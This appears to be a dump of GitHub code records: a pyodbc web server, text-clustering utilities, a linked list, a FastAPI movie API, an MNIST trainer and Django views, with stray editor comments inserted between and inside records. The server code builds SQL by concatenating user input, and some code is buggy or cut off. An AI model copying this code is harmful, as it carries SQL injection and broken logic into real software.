for name in self._columns[fields[\"type_value\"]]:\r\n select_columns += \" \" + name + \",\"\r\n select_columns_list.append(name)\r\n\r\n select_columns = select_columns[:-1]\r\n\r\n query = 'SELECT ' + 
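# Editor's note: the Jokempo record above settles each round with three nested
# if/elif blocks, one per player choice. A common refactor states the rules once
# as a "choice beats choice" mapping; this helper is an illustrative sketch, not
# code from the record (1=Pedra/Rock, 2=Papel/Paper, 3=Tesoura/Scissors):
BEATS = {1: 3, 2: 1, 3: 2}  # each key defeats its value

def round_result(player, machine):
    if player == machine:
        return "draw"
    return "win" if BEATS[player] == machine else "loss"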
select_columns + ' FROM digital_commodities c,' + fields['type_value'] + \\\r\n ' v where c.commodity_id=v.commodity_id'\r\n\r\n #print(select_columns)\r\n\r\n if fields['name_value'] != \"\":\r\n query += \" and c.name LIKE '%\" + fields['name_value'] + \"%'\"\r\n\r\n if fields['immediate_value'] != 'None':\r\n query += ' and c.immediate_sending=' + fields['immediate_value']\r\n\r\n cursor.execute(query)\r\n return cursor, select_columns_list\r\n\r\n def fill_html_string(self, cursor , columns_names):\r\n if cursor == -1:\r\n return ''\r\n\r\n style_file = open(\"style.txt\", \"r\") # read css file \r\n html_string = \"\" \\\r\n \"Digatal Database \"\r\n html_string += style_file.read()\r\n html_string += \"\" \\\r\n \"\"\r\n\r\n for node in columns_names:\r\n html_string += ''\r\n \r\n html_string += ''\r\n \r\n for row in cursor:\r\n html_string += ''\r\n #html_string += str(row)\r\n for node in row: \r\n html_string += ''\r\n html_string += ''\r\n\r\n\r\n html_string += \"
    ' + str(node) + '
    ' + str(node) + '
    \"\r\n #print(html_string)\r\n return html_string\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nhttpd = HTTPServer(('', 8080), SimpleHTTPRequestHandler)\r\nprint(\"waiting...\")\r\nhttpd.serve_forever()\r\n","repo_name":"arash99s/digitalDB","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70504947607","text":"import csv\nimport os\nimport random\n\nimport nltk\nimport torch\nimport numpy as np\nfrom torch.backends import cudnn as cudnn\n\nfrom models import InfersentAdaptor\n\n\ndef load_infersent(infersent_path, return_adaptor=False, use_cuda=torch.cuda.is_available()):\n infersent = torch.load(infersent_path) if use_cuda else \\\n torch.load(infersent_path, map_location=lambda storage, loc: storage)\n if return_adaptor:\n infersent = InfersentAdaptor(infersent)\n return infersent\n\n\ndef load_csv_corpus(path):\n labels = []\n sents = []\n with open(path, 'r') as f:\n reader = csv.reader(f)\n for item in reader:\n labels.append(int(item[0]))\n tmp_doc = item[1].strip()\n sents.append(tmp_doc)\n ids = range(len(sents))\n return sents, labels, ids\n\n\ndef encode_sents(infersent, sents, split_sents=False, layer_norm=False):\n if False:\n if split_sents:\n all_feat = []\n for doc in sents:\n tmp_sents = nltk.sent_tokenize(doc)\n tmp_feat = infersent.encode(tmp_sents, tokenize=False, layer_norm=layer_norm)\n all_feat.append(tmp_feat.mean(axis=0))\n feat = np.stack(all_feat, axis=0)\n else:\n feat = infersent.encode(sents, tokenize=False, layer_norm=layer_norm)\n else:\n feat = infersent_encode_sents(infersent, sents, split_sents=split_sents, layer_norm=layer_norm)\n return feat\n\n\ndef infersent_encode_sents(infersent, sents, split_sents=False, layer_norm=False, batch_size=256, verbose=False):\n if split_sents:\n all_feat = []\n batch_sents = []\n batch_slens = []\n for doc_id, doc in enumerate(sents):\n tmp_sents = nltk.sent_tokenize(doc)\n # Put current batch and batch_size respectively into batch_sents and batch_slens.\n batch_sents.extend(tmp_sents)\n batch_slens.append(len(batch_sents))\n # If current sents list size > batch_size,\n # encode all sents by infersent, get paragraph vector and reset batch_sents and batch_slens.\n if len(batch_sents) >= batch_size or doc_id == len(sents) - 1:\n batch_feat = infersent.encode(batch_sents, tokenize=False, layer_norm=layer_norm)\n for i, tmp_len in enumerate(batch_slens):\n bidx = batch_slens[i-1] if i > 0 else 0\n eidx = batch_slens[i]\n tmp_feat = batch_feat[bidx:eidx]\n all_feat.append(tmp_feat.mean(axis=0))\n batch_sents = []\n batch_slens = []\n if verbose:\n print('Infersent Processed {} Text'.format(doc_id+1))\n assert len(sents) == len(all_feat)\n feat = np.stack(all_feat, axis=0)\n else:\n feat = infersent.encode(sents, tokenize=False, layer_norm=layer_norm)\n return feat\n\n\ndef load_constraint_file(path):\n constraints = []\n with open(path, 'r') as f:\n reader = csv.reader(f)\n for item in reader:\n constraints.append((int(item[0]), int(item[1])));\n return constraints\n\n\ndef cluster_acc(y_true, y_pred):\n \"\"\"\n Calculate clustering accuracy. 
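# Editor's note: in the HTTP-server record above, database() splices the
# user-supplied name and immediate_sending values straight into the SQL string,
# which is open to SQL injection. pyodbc supports '?' placeholders, so an
# equivalent parameterized sketch of those two filters would look like this
# (table and column names cannot be parameterized, but fields['type_value'] is
# already constrained by the _columns dictionary lookup earlier in the method):
params = []
if fields['name_value'] != "":
    query += " and c.name LIKE ?"
    params.append(f"%{fields['name_value']}%")
if fields['immediate_value'] != 'None':
    query += " and c.immediate_sending = ?"
    params.append(fields['immediate_value'])
cursor.execute(query, params)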
Require scikit-learn installed\n\n # Arguments\n y: true labels, numpy.array with shape `(n_samples,)`\n y_pred: predicted labels, numpy.array with shape `(n_samples,)`\n\n # Return\n accuracy, in [0,1]\n \"\"\"\n y_true = y_true.astype(np.int64)\n y_pred = y_pred.astype(np.int64)\n assert y_pred.size == y_true.size, 'y_pred.size {} y_true.size {}'.format(y_pred.size, y_true.size)\n D = max(y_pred.max(), y_true.max()) + 1\n w = np.zeros((D, D), dtype=np.int64)\n for i in range(y_pred.size):\n w[y_pred[i], y_true[i]] += 1\n from sklearn.utils.linear_assignment_ import linear_assignment\n ind = linear_assignment(w.max() - w)\n return sum([w[i, j] for i, j in ind]) * 1.0 / y_pred.size\n\n\ndef align_labels(y_true, y_pred):\n y_true = y_true.astype(np.int64)\n y_pred = y_pred.astype(np.int64)\n assert y_pred.size == y_true.size, 'y_pred.size {} y_true.size {}'.format(y_pred.size, y_true.size)\n D = max(y_pred.max(), y_true.max()) + 1\n w = np.zeros((D, D), dtype=np.int64)\n for i in range(y_pred.size):\n w[y_pred[i], y_true[i]] += 1\n from sklearn.utils.linear_assignment_ import linear_assignment\n ind = linear_assignment(w.max() - w)\n return ind\n\n\ndef dump_feat(feat_path, feat, labels=None, ids=None):\n import h5py\n f = h5py.File(feat_path, 'w')\n f['feat'] = feat.astype(dtype=np.float32)\n if labels is not None:\n f['labels'] = np.array(labels)\n if ids is not None:\n f['ids'] = np.array(ids)\n f.close()\n\n\ndef load_feat(feat_path):\n import h5py\n f = h5py.File(feat_path, 'r')\n feat = np.array(f['feat'], dtype=np.float32)\n labels = None\n ids = None\n if 'labels' in f.keys():\n labels = np.array(f['labels'])\n if 'ids' in f.keys():\n ids = np.array(f['ids'])\n return feat, labels, ids\n\n\ndef initialize_environment(random_seed=50, use_cuda=torch.cuda.is_available()):\n # Set the seed for reproducing the results\n random.seed(random_seed)\n np.random.seed(random_seed)\n torch.manual_seed(random_seed)\n if use_cuda:\n torch.cuda.manual_seed_all(random_seed)\n torch.backends.cudnn.enabled = True\n cudnn.benchmark = True\n\n\ndef load_seeds_dict(path):\n import csv\n from collections import defaultdict\n results = defaultdict(list)\n if os.path.exists(path):\n with open(path) as f:\n reader = csv.reader(f)\n for item in reader:\n i = int(item[0])\n l = int(item[1])\n results[l].append(i)\n return results\n","repo_name":"KEAML-JLU/DeepTextClustering","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5770,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"32443466594","text":"x,y=input().split()\nif x.isalpha():\n print(\"Invaild\")\nelse:\n x=int(x)\n y=int(y)\n arm=int(0)\n for i in range(x,y):\n chk=int(i)\n arm=0\n\n while chk!=0:\n z=chk%10;\n \n arm=arm+(z**3)\n chk=int(chk/10)\n\n if arm==i:\n print(i)\n","repo_name":"manunag/GUVI","sub_path":"beg18.py","file_name":"beg18.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30524213461","text":"class Node:\n def __init__(self,initdata):\n self.data=initdata\n self.next=None\n self.before=None\n\n def getdata(self):\n return self.data\n def getnext(self):\n return self.next\n def getbefore(self):\n return self.before\n\n def setdata(self,newdata):\n self.data=newdata\n def setnext(self,newnext):\n self.next=newnext\n def setbefore(self,newnext):\n self.before=newnext\n\nclass DoubleLinkedList:\n def __init__(self):\n self.head=None\n 
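# Editor's note: cluster_acc() and align_labels() above import
# sklearn.utils.linear_assignment_, which was deprecated and then removed from
# scikit-learn. scipy.optimize.linear_sum_assignment is the usual replacement;
# it returns two index arrays rather than an array of index pairs. A sketch of
# cluster_acc rewritten against the scipy API:
import numpy as np
from scipy.optimize import linear_sum_assignment

def cluster_acc_scipy(y_true, y_pred):
    y_true = y_true.astype(np.int64)
    y_pred = y_pred.astype(np.int64)
    D = max(y_pred.max(), y_true.max()) + 1
    w = np.zeros((D, D), dtype=np.int64)
    for i in range(y_pred.size):
        w[y_pred[i], y_true[i]] += 1
    row_ind, col_ind = linear_sum_assignment(w.max() - w)
    return w[row_ind, col_ind].sum() * 1.0 / y_pred.size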
self.end=None\n def isempty(self):\n return self.head==None\n def addhead(self,newdata):\n temp=Node(newdata)\n temp.setnext(self.head)\n if self.head==None:\n self.head=temp\n self.end=temp\n else:\n self.head.setbefore(temp)\n self.head=temp\n def addend(self,newdata):\n temp=Node(newdata)\n temp.setbefore(self.end)\n if self.end==None:\n self.head=temp\n self.end=temp\n else:\n self.end.setbefore(temp)\n self.end=temp\n def length(self):\n size=0\n node=self.head\n while node!=None:\n size+=1\n node=node.getnext()\n return size\n def search(self,target):\n found=False\n current=self.head\n while current!=None and found==False:\n if current.getdata()==target:\n found=True\n current=current.getnext()\n return found\n def remove(self,target):\n found = False\n current = self.head\n previous=None\n while current != None and found == False:\n if current.getdata() == target:\n if previous!=None:\n previous.setnext(current.getnext())\n else:\n self.head=current.getnext()\n found = True\n else:\n previous=current\n current = current.getnext()\n return found\n\n#test\nmylist=DoubleLinkedList()\nmylist.addhead(31)\nmylist.addhead(11)\nmylist.addhead(21)\nmylist.addhead(4)\nmylist.addhead(54)\nmylist.remove(31)\nmylist.remove(11)\nmylist.search(31)\n\n","repo_name":"neil-n-zhang/data-structures-using-python","sub_path":"Chapter3/doublelinkedlist3_27.py","file_name":"doublelinkedlist3_27.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27133191475","text":"# @echo off\n# rem='''\n# set pythonioencoding=utf8\n# python -i -x \"%~f0\" %*\n# exit /b \n# '''\n\n\n\nimport fileinput as fi\nfrom sys import argv as a\nfrom pathlib import Path as p\nfrom os import system as sys\nfrom re import search\nsys('')\ndef r(i=None,e='utf8'):\n with fi.FileInput(files=i,openhook=fi.hook_encoded(e, 'backslashreplace')) as f:\n yield from ((x.rstrip('\\n'),f) for x in f)\n\nh = lambda z:(j for x in z for j in x)\n\n\nm = lambda x=0:f'\\33[{x}m'\n\ns = lambda x:repr(x)[1:-1]if search(r'[\\x00-\\x08\\x0b-\\x1f]',x) else x \nsp = lambda k,x:h((x[:a],x[a:b],x[b:]) for a,b in (search(k,x).span(),))\ntpl = ('',m('7;37'),m(0))\nw = lambda x,k:''.join(h(zip(tpl,map(s,sp(k,x)))))\nlr = il = lambda k,x: k in x\nir = lambda k,x: search(k,x)\nf = lambda i,k:((y.filename(),y.filelineno(),w(x.strip(),k)) for x,y in i if lr(k,x))\n\npre = [*map(m,('7;32','7;36',0))]\nc = lambda z:zip(pre,z)\n\ne = m(0)+'\\n'\n\nk,i=a[1:2]and a[1]or 'pyd',a[2:3]and a[2]or '*.7z'\nlr = ir if k[0]==k[-1]=='\\'' else il \nk = k[1:-1] if lr==ir else k\nany(print(*h(c(x)),end=e) for y in p().glob(i) if y.is_file() for x in f(r([y]),k))\n\n\n\n","repo_name":"c1ino/py3toys","sub_path":"findstr.py","file_name":"findstr.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70076576089","text":"\"\"\"\n- MNIST\n- DataLoader, Transformation\n- Multilayer Neural Net with activation functions\n- Loss and optimizer\n- Training loop\n- Model evaluation\n- GPU support? 
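# Editor's note on the DoubleLinkedList record above: addend() calls
# self.end.setbefore(temp) on the old tail, overwriting the tail's backward
# link instead of setting its forward one, and remove() only rewires next
# pointers, so before pointers (and self.end) go stale after a removal. An
# illustrative corrected sketch of both methods, written against the record's
# own accessors (drop-in replacements inside the class):
def addend(self, newdata):
    temp = Node(newdata)
    temp.setbefore(self.end)
    if self.end is None:
        self.head = temp
    else:
        self.end.setnext(temp)   # old tail now points forward to the new node
    self.end = temp

def remove(self, target):
    current = self.head
    while current is not None:
        if current.getdata() == target:
            if current.getbefore() is not None:
                current.getbefore().setnext(current.getnext())
            else:
                self.head = current.getnext()
            if current.getnext() is not None:
                current.getnext().setbefore(current.getbefore())
            else:
                self.end = current.getbefore()
            return True
        current = current.getnext()
    return False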
-> Need special version for M1, need to investigate\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torchvision\nfrom torchvision.transforms import ToTensor, Compose\nfrom torch.utils.data import DataLoader\nimport matplotlib.pyplot as plt\n\n# seed\nSEED = 42\ntorch.manual_seed(SEED)\n\n#\nPRINT_EVERY_NTH_ITERATION = 100\n\nLEARNING_RATE = 1e-3\nBATCH_SIZE = 128\nN_EPOCH = 3\n\n# regularization\nL2_NORM = 0\n\n#===data====\n# # inspection on the raw data\n# X0 = torchvision.datasets.MNIST('data', train=False, transform=ToTensor())[0][0]\n# y0 = torchvision.datasets.MNIST('data', train=False, transform=ToTensor())[0][1]\n# print(X0.shape) # [1, 28, 28]: 1 channel, 28*28 pixel\n\n# plt.imshow(X0[0], cmap='gray') # only get the value of the first channel, as it only has one channel anyway\n# plt.show()\n# print(y0)\n\n\n# MNIST Dataloader and Transformation\nclass Flatten:\n    def __call__(self, X):\n        return X.reshape(-1) # (1, 28, 28) -> (784,)\n\nmnist = torchvision.datasets.MNIST('data', train=True, transform=Compose([ToTensor(), Flatten()]))\ndataloader = DataLoader(dataset=mnist, batch_size=BATCH_SIZE, shuffle=True, drop_last=True)\nn_samples = len(mnist) #60000\nn_features = mnist[0][0].shape[0]\nn_classes = 10\n\n\n\n# model\nclass MultiLayer(nn.Module):\n    def __init__(self, n_features, n_classes):\n        super().__init__()\n        self.linear1 = nn.Linear(n_features, 256)\n        self.relu1 = nn.ReLU()\n        self.linear2 = nn.Linear(256, 64)\n        self.relu2 = nn.ReLU()\n        self.out = nn.Linear(64, n_classes)\n\n    def forward(self, x):\n        out = self.linear1(x)\n        out = self.relu1(out)\n        out = self.linear2(out)\n        out = self.relu2(out)\n        out = self.out(out)\n        return out\n\n# Loss and optimizer\nmodel = MultiLayer(n_features=n_features, n_classes=n_classes)\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=LEARNING_RATE, weight_decay=L2_NORM)\n# Training loop\nfor epoch in range(N_EPOCH):\n    for i, (X, y) in enumerate(dataloader):\n        # forward\n        y_pred = model(X)\n        loss = criterion(y_pred, y)\n\n        # backward\n        loss.backward()\n\n        # update\n        optimizer.step()\n        optimizer.zero_grad()\n\n        # info: logging \n        if (i + 1) % PRINT_EVERY_NTH_ITERATION == 0:\n            print(f'epoch: {epoch + 1}, iteration: {i + 1}, loss: {loss: .8f}')\n\n\n# ==== evaluation=====\ndef evaluate(dataset) -> float:\n    with torch.no_grad():\n        data = DataLoader(dataset=dataset, batch_size=len(dataset), shuffle=False, drop_last=False)\n        X, y = next(iter(data))\n        # print(f\"X.shape, y.shape: {X.shape, y.shape}\")\n        \n        y_pred = model(X)\n        y_cls = torch.argmax(y_pred, dim=1)\n        micro_accuracy = y_cls.eq(y).sum()/y.shape[0]\n        # print(f\"y_cls.shape, y.shape: {y_cls.shape, y.shape}\")\n        print(f\"The micro accuracy is: {micro_accuracy}\")\n        return micro_accuracy\n\n# Model evaluation on train\ntrain_dataset = torchvision.datasets.MNIST('data', train=True, transform=Compose([ToTensor(), Flatten()]))\ntrain_accuracy = evaluate(train_dataset)\n# Model evaluation on test\ntest_dataset = torchvision.datasets.MNIST('data', train=False, transform=Compose([ToTensor(), Flatten()]))\ntest_accuracy = evaluate(test_dataset)\n\n ","repo_name":"AlsonYang/study-pytorch","sub_path":"6_MNIST_classification.py","file_name":"6_MNIST_classification.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} {"seq_id":"31965041934","text":"from collections import defaultdict\nimport pprint\n\n\n''' This class represents an undirected weighted graph using 
adjacency list representation '''\nclass Graph:\n\n def __init__(self,vertices=0):\n self.V= vertices # No. of vertices\n self.cost = 0 # Weight sum of all added edges\n self.graph = defaultdict(list) # default dictionary to store graph\n\n def addEdge(self,u,v, weight):\n ''' Function to add an edge to graph '''\n\n self.cost += weight\n self.graph[u].append((v,weight))\n self.graph[v].append((u,weight))\n\n \n def delEdge(self, u, v):\n ''' This function removes edge u-v from graph '''\n\n for index, key in enumerate(self.graph[u]):\n if key == v:\n self.graph[u].pop(index)\n for index, key in enumerate(self.graph[v]):\n if key == u:\n self.graph[v].pop(index)\n\n def rmvEdge(self, u, v, w):\n ''' This function removes edge u-v-w from graph '''\n\n for index, key in enumerate(self.graph[u]):\n if key[0] == v and key[1] == w:\n self.graph[u].pop(index)\n for index, key in enumerate(self.graph[v]):\n if key[0] == u and key[1] == w:\n self.graph[v].pop(index)\n\n ","repo_name":"GiulioPiazza/CPP","sub_path":"Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2966860857","text":"list = []\na,b = map(int,input().split())\nfor x in range(1,47):\n for y in range(x):\n list.append(x)\nnum = 0\nif(a < b):\n for i in range(b-a+1):\n num = num + list[a-1 + i]\nif(a == b):\n num = list[a-1]\nprint(num)","repo_name":"bria051/Algorithm","sub_path":"Math/mathematics_test.py","file_name":"mathematics_test.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"69804470809","text":"from typing import List\n\ndef binary_search(nums: List[int], target: int, lower: bool) -> int:\n n = len(nums)\n left, right, ans = 0, n - 1, n\n while left <= right:\n index = (left + right) // 2\n mid = nums[index]\n if mid > target or (lower and mid >= target):\n right = index - 1\n ans = index\n else:\n left = index + 1\n \n return ans\n\ndef searchRange(nums: List[int], target: int) -> List[int]:\n left = binary_search(nums, target, True)\n right = binary_search(nums, target, False) - 1\n if left <= right and right < len(nums) and nums[left] == target and nums[right] == target:\n return [left, right]\n return[-1, -1]\n\n\nif __name__ == \"__main__\":\n print(searchRange(nums = [5,7,7,8,8,10], target = 8))","repo_name":"DengBoCong/Algorithm","sub_path":"core/tmp/Python/array/find_first_and_last_position_of_element_in_sorted_array.py","file_name":"find_first_and_last_position_of_element_in_sorted_array.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"40931239652","text":"if __name__=='__main__' :\n arr=list(input().split())\n\n result=[int(arr[0])] #수열 저장\n temp=[] #제거되는 것 저장\n x=arr[0] # 수\n\n while True:\n sum=0 #합\n for i in str(x):\n sum+=int(i)**int(arr[1]) #수열 구하기\n x=sum\n\n if sum in result: #반복되는 것이라면 제거\n temp.append(sum) #제거된 것인걸 저장하기 위해 \n result.remove(sum) #제거\n elif sum in temp: #이미 제거되었던 것이라면 계속 반복 break\n break\n else: #처음 나오는 수라면\n result.append(sum)\n\n print(len(result))","repo_name":"Parksohui/Algorithm","sub_path":"Baekjoon/백준2331반복수열.py","file_name":"백준2331반복수열.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21107072219","text":"from fastapi import 
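# Editor's note on the Graph record above: adjacency entries are stored as
# (vertex, weight) tuples, but delEdge() compares each whole tuple against the
# bare vertex (key == v), so it never removes anything, and it also pops from
# the list while iterating over it. A corrected sketch that matches on the
# vertex element, mirroring how rmvEdge() already unpacks the tuples:
def delEdge(self, u, v):
    ''' Remove every u-v edge from the graph, regardless of weight. '''
    self.graph[u] = [entry for entry in self.graph[u] if entry[0] != v]
    self.graph[v] = [entry for entry in self.graph[v] if entry[0] != u]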
FastAPI\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import linear_kernel\n\napp = FastAPI()\n\n@app.get('/peliculas_idioma/{idioma}')\ndef peliculas_idioma(idioma:str):\n df = pd.read_csv('langpeli.csv')\n d = df.loc[df.language == idioma]\n c = d['num_movies'].to_list()[0]\n \n return{'Idioma:':idioma, 'cantidad de peliculas:':c}\n\n@app.get('/peliculas_duracion/{pelicula}')\ndef peliculas_duracion(pelicula:str):\n ##Se ingresa una pelicula y devuelve la duracion y el año\n df = pd.read_csv('pelidur.csv')\n d = df.loc[df.title == pelicula]\n du = d['runtime'].to_list()[0]\n y = d['year'].to_list()[0]\n \n return{'Pelicula:':pelicula, 'duracion:':du, 'anio:':y}\n\n@app.get('/franquicia/{franquicia}')\ndef franquicia(franquicia:str):\n ##Se ingresa la franquicia y la funcion retorna la franquicia, cantidad de peliculas, ganancia total y ganancia promedio\n df = pd.read_csv('franq.csv')\n d = df.loc[df.belongs_to_collection == franquicia]\n c = d['count'].to_list()[0]\n m = d['mean'].to_list()[0]\n s = d['sum'].to_list()[0]\n return {'Franquicia':franquicia, 'cantidad':c, 'ganancia_total':s, 'ganancia_promedio':m}\n\n\n@app.get('/pelicula_pais/{pais}')\ndef pelicula_pais(pais:str):\n ##Ingresas el pais, retornando la cantidad de peliculas producidas en el mismo\n df = pd.read_csv('paispeli.csv')\n d = df.loc[df.country == pais]\n d = d['num_movies'].to_list()[0]\n return {'Pais':pais, 'cantidad':d}\n\n\n@app.get('/productoras_exitosas/{productora}')\ndef productoras_exitosas(productora:str):\n ##Ingresa la productora, retornando la ganancia total y la cantidad de peliculas que produjeron\n df = pd.read_csv('prod.csv')\n d = df.loc[df.companies == productora]\n c = d['Number'].to_list()[0]\n m = d['Average'].to_list()[0]\n s = d['Total'].to_list()[0]\n\n return {'Productora':productora, 'Ganancia_total':s, 'Cantidad':c, 'Promedio':m}\n\n\n@app.get('/get_director/{nombre_director}')\ndef get_director(nombre_director:str):\n ##Se ingresa el nombre de un director que se encuentre dentro de un dataset debiendo devolver el exito del mismo medio a traves del retorno.\n ##Ademas, debera devolver el nombre de cada pelicula con la fecha de lanzamiento, retorno individual, costo y ganancia de la misma.\n df = pd.read_csv('dir.csv')\n df1 = pd.read_csv('dir_pel.csv')\n d = df.loc[df.director == nombre_director]\n r = d['return'].to_list()\n\n b = df1[(df1['director'] == nombre_director) & (df1['return'].notnull())]\n g = b['title'].to_list()\n a = b['year'].to_list()\n rr = b['return'].to_list()\n bd = b['budget'].to_list()\n rv = b['revenue'].to_list()\n return {'director':nombre_director, 'retorno_total_director':r,\n 'peliculas':g, 'anio':a, 'retorno_pelicula':rr,\n 'budget_pelicula':bd, 'revenue_pelicula':rv}\n\n\n@app.get('/recomendacion/{titulo}')\n#ML\ndef recomendacion(titulo):\n ##Ingresas un nombre de pelicula y te recomienda las similares en una lista\n i = pd.read_csv('titulo.csv')\n tfidf = TfidfVectorizer(stop_words=\"english\")\n i[\"overview\"] = i[\"overview\"].fillna(\"\")\n\n tfidf_matriz = tfidf.fit_transform(i[\"overview\"])\n coseno_sim = linear_kernel(tfidf_matriz, tfidf_matriz)\n\n indices = pd.Series(i.index, index=i[\"title\"]).drop_duplicates()\n idx = indices[titulo]\n simil = list(enumerate(coseno_sim[idx]))\n simil = sorted(simil, key=lambda x: x[1], reverse=True)\n simil = simil[1:11]\n movie_index = [i[0] for i in simil]\n\n lista = i[\"title\"].iloc[movie_index].to_list()[:5]\n\n return {'lista 
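# Editor's note: the /recomendacion endpoint above re-reads titulo.csv and
# refits the TF-IDF matrix on every request. A common pattern computes them once
# and reuses the result across requests; functools.lru_cache is one minimal way
# to do that (the helper name below is hypothetical, not from the record):
from functools import lru_cache

@lru_cache(maxsize=1)
def load_similarity_index():
    frame = pd.read_csv('titulo.csv')
    frame["overview"] = frame["overview"].fillna("")
    tfidf = TfidfVectorizer(stop_words="english")
    matrix = tfidf.fit_transform(frame["overview"])
    return frame, linear_kernel(matrix, matrix)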
recomedada': lista}\n","repo_name":"luisEmmanuel/PI_MLOps","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37254077066","text":"from django.views import View\nfrom onlineapp.models import *\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.urls import resolve\nfrom django.http import HttpResponse\nfrom onlineapp.forms.FormModule import *\nfrom django.contrib.auth import *\nfrom django.contrib.auth.mixins import *\n\n\n\nclass DisplayCollegeView(LoginRequiredMixin, View):\n login_url = '/onlineapp/login/'\n def get(self, request, *args, **kwargs):\n c = college.objects.values(\"name\", \"acronym\").distinct()\n DICT_QUERY_SET = dict()\n DICT_QUERY_SET['result_set'] = c\n DICT_QUERY_SET['permissions']= request.user.get_all_permissions()\n return render(request, 'onlineapp_queries_link.html', DICT_QUERY_SET)\n\n\n\nclass CollegeView(LoginRequiredMixin, View):\n login_url = '/onlineapp/login/'\n def get(self, request, *args, **kwargs):\n if kwargs:\n resultset = student.objects.filter(college=kwargs.get('acronym')).values(\"db_folder\", \"college\",\"mocktest1__total\")\n DICT_QUERY_SET = dict()\n DICT_QUERY_SET['result_set'] = resultset\n DICT_QUERY_SET['college_name'] = kwargs.get('acronym')\n DICT_QUERY_SET['title_student'] = \"Students from {} college\".format(kwargs.get('acronym'))\n DICT_QUERY_SET['permissions'] = request.user.get_all_permissions()\n return render(\n request,\n template_name=\"onlineapp_queries_students.html\",\n context=DICT_QUERY_SET\n )\n\n\nclass AddCollegeView(LoginRequiredMixin, View):\n login_url = '/onlineapp/login/'\n def get(self, request, *args, **kwargs):\n form = AddCollege()\n if resolve(request.path_info).url_name == 'delete_college':\n college.objects.get(acronym=kwargs.get('acronym')).delete()\n return redirect(\"http://127.0.0.1:8000/onlineapp/collegeret1/\")\n if kwargs:\n c = college.objects.filter(**kwargs).first()\n form = AddCollege(instance=c)\n return render(\n request,\n template_name=\"Create_college.html\",\n context=\n {\n 'form': form\n }\n )\n\n def post(self, request, *args, **kwargs):\n if request.method == 'POST':\n if resolve(request.path_info).url_name == 'edit_college':\n c = college.objects.get(acronym=kwargs.get('acronym'))\n form = AddCollege(request.POST, instance=c)\n if form.is_valid():\n topic = form.save(commit=False)\n topic.save()\n return render(\n request,\n template_name=\"Create_college.html\",\n context=\n {\n 'form': form,\n 'title': \"Edited Successfully\"\n }\n )\n form = AddCollege(request.POST)\n if form.is_valid():\n topic = form.save(commit=False)\n topic.save()\n return render(\n request,\n template_name=\"Create_college.html\",\n context=\n {\n 'form': form,\n 'title': \"Inserted Successfully\"\n }\n )\n else:\n form = AddCollege()\n return render(\n request,\n template_name=\"Create_college.html\",\n context=\n {\n 'form': form,\n 'title': \"College Insertion\"\n }\n )\n\n\nclass AddStudentView(LoginRequiredMixin, View):\n login_url = '/onlineapp/login/'\n\n def get(self, request, *args, **kwargs):\n form_marks = AddMarks()\n form_student = AddStudent()\n if resolve(request.path_info).url_name == 'delete_student_marks':\n student.objects.get(db_folder=kwargs.get('db_folder')).delete()\n return redirect(\"http://127.0.0.1:8000/onlineapp/collegeret1/college/\" + kwargs.get('acronym') + \"/\")\n if kwargs and 
kwargs.get('db_folder'):\n s = student.objects.get(db_folder=kwargs.get('db_folder'))\n form_student = AddStudent(instance=s)\n m = MockTest1.objects.get(student=kwargs.get('db_folder'))\n if m is not None:\n form_marks = AddMarks(instance=m)\n return render(\n request,\n template_name=\"Create_student_marks.html\",\n context=\n {\n 'form_student': form_student,\n 'form_marks': form_marks,\n }\n )\n\n def post(self, request, *args, **kwargs):\n form_student = AddStudent()\n form_marks = AddMarks()\n if request.method == 'POST':\n if resolve(request.path_info).url_name == 'edit_student_marks':\n s = student.objects.get(db_folder=kwargs.get('db_folder'))\n m = MockTest1.objects.get(student=s)\n s.name = str(request.POST.get('name'))\n s.email = str(request.POST.get('email'))\n s.college_id = kwargs.get('acronym')\n s.save()\n m.total = int(request.POST.get('problem1')) + int(request.POST.get('problem2')) + int(\n request.POST.get('problem3')) + int(request.POST.get('problem4'))\n m.problem1 = request.POST.get('problem1')\n m.problem2 = request.POST.get('problem2')\n m.problem3 = request.POST.get('problem3')\n m.problem4 = request.POST.get('problem4')\n m.save()\n return redirect(\"http://127.0.0.1:8000/onlineapp/collegeret1/college/\" + kwargs.get('acronym') + \"/\")\n else:\n form_student = AddStudent()\n form_marks = AddMarks()\n return render(\n request,\n template_name=\"Create_student_marks.html\",\n context=\n {\n 'form_student': form_student,\n 'form_marks': form_marks\n }\n )\n\n\n\nclass LoginController(View):\n def get(self, request, *args, **kwargs):\n login = Login()\n return render(\n request,\n template_name=\"login.html\",\n context=\n {\n 'login': login\n }\n )\n\n def post(self, request, *args, **kwargs):\n 